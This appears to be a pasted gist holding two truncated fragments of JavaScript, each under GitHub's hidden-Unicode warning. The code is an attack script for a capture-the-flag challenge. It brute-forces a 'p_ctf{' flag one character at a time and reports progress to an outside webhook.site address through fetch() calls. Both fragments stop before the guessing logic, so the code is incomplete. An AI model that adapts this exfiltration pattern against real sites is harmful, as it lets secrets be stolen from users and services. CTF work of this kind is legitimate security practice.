This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (async function() { | |
| // 1. YOUR WEBHOOK | |
| var webhook = "https://webhook.site/1840a34e-be0e-4392-a483-7869e4843c96"; | |
| var flag = "p_ctf{"; | |
| var charset = "abcdefghijklmnopqrstuvwxyz0123456789_}"; | |
| // 2. Send a start signal (Diagnostic) | |
| fetch(webhook + "?status=STARTING_ATTACK"); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (async function() { | |
| const webhook = "https://webhook.site/1840a34e-be0e-4392-a483-7869e4843c96"; // <--- PUT YOUR WEBHOOK HERE | |
| let flag = "p_ctf{"; | |
| const charset = "abcdefghijklmnopqrstuvwxyz0123456789_}"; | |
| // Send a "START" signal so you know the bot ran the script | |
| fetch(webhook + "?status=started"); | |
| while (!flag.endsWith("}")) { | |
| let found = false; |